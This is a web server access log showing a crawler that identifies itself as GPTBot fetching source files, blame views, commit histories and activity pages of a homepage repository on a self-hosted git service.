[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" -[17/Feb/2026:13:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" -[17/Feb/2026:13:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" -[17/Feb/2026:13:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" -[17/Feb/2026:13:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" -[17/Feb/2026:13:18:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:13:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/" -[17/Feb/2026:13:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/weekly" [Client 74.7.227.38] [Length 8369] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" -[17/Feb/2026:13:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13898] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" -[17/Feb/2026:13:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11466] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" -[17/Feb/2026:13:19:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426" [Client 74.7.227.38] [Length 10563] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:13:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity" [Client 74.7.227.38] [Length 8586] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" -[17/Feb/2026:13:19:02 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" -[17/Feb/2026:13:19:02 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" -[17/Feb/2026:13:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects" [Client 74.7.227.38] [Length 7763] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" -[17/Feb/2026:13:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/watchers" [Client 74.7.227.38] [Length 7737] [Gzip 2.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" -[17/Feb/2026:13:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/branches" [Client 74.7.227.38] [Length 10357] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:13:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10859] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" -[17/Feb/2026:13:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10775] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" -[17/Feb/2026:13:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" -[17/Feb/2026:13:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16463] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" -[17/Feb/2026:13:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/contributors" [Client 74.7.227.38] [Length 7615] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" -[17/Feb/2026:13:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/code-frequency" [Client 74.7.227.38] [Length 7537] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" -[17/Feb/2026:13:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/recent-commits" [Client 74.7.227.38] [Length 7524] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" -[17/Feb/2026:13:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/monthly" [Client 74.7.227.38] [Length 8592] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" -[17/Feb/2026:13:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14190] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" -[17/Feb/2026:13:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15543] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" -[17/Feb/2026:13:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" [Client 74.7.227.38] [Length 14804] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" -[17/Feb/2026:13:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16466] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" -[17/Feb/2026:13:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" [Client 74.7.227.38] [Length 13921] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" -[17/Feb/2026:13:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" [Client 74.7.227.38] [Length 13921] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" -[17/Feb/2026:13:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" -[17/Feb/2026:13:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16910] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" -[17/Feb/2026:13:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15538] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" -[17/Feb/2026:13:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" [Client 74.7.227.38] [Length 14805] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" -[17/Feb/2026:13:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16465] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" -[17/Feb/2026:13:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" -[17/Feb/2026:13:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" -[17/Feb/2026:13:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" -[17/Feb/2026:13:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" -[17/Feb/2026:13:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" -[17/Feb/2026:13:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16909] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" -[17/Feb/2026:13:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15899] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" -[17/Feb/2026:13:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" [Client 74.7.227.38] [Length 14959] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" -[17/Feb/2026:13:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" -[17/Feb/2026:13:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" -[17/Feb/2026:13:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" -[17/Feb/2026:13:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15901] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" -[17/Feb/2026:13:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14293] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" -[17/Feb/2026:13:19:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" -[17/Feb/2026:13:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" [Client 74.7.227.38] [Length 14957] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" -[17/Feb/2026:13:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16910] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" -[17/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" [Client 74.7.227.38] [Length 13779] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" -[17/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" -[17/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" -[17/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" -[17/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" -[17/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 